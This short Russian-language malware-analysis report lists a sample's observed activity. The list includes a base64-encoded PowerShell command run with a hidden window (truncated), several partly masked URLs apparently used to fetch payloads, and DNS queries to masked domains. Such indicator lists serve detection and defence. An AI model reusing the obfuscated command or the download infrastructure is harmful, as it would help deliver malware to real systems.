Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABYAGcAegBkAGsAZQBrAHEAbgA9ACcARQBoAGQAYwBlAHEAdgB3ACcAOwAkAEkAcQBxAHAAYgB6AHUAZQBnACAAPQAgACcAMQA5AD...
- http://di####learning.cn/wp-includes/8merf/
- http://ca#####.##gitalcertvalidation.com/TrustAsiaTLSRSACA.crt
- http://www.te######aoutdoorliving.com/lpo7uw/0xua0vw/
- DNS ASK bo##ia.com
- DNS ASK di####learning.cn
- DNS ASK ca#####.##gitalcertvalidation.com
- DNS ASK te######aoutdoorliving.com
- DNS ASK mo####delzein.com
- DNS ASK in#####ial-parks.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABYAGcAegBkAGsAZQBrAHEAbgA9ACcARQBoAGQAYwBlAHEAdgB3ACcAOwAkAEkAcQBxAHAAYgB6AHUAZQBnACAAPQAgACcAMQA5AD...' (со скрытым окном)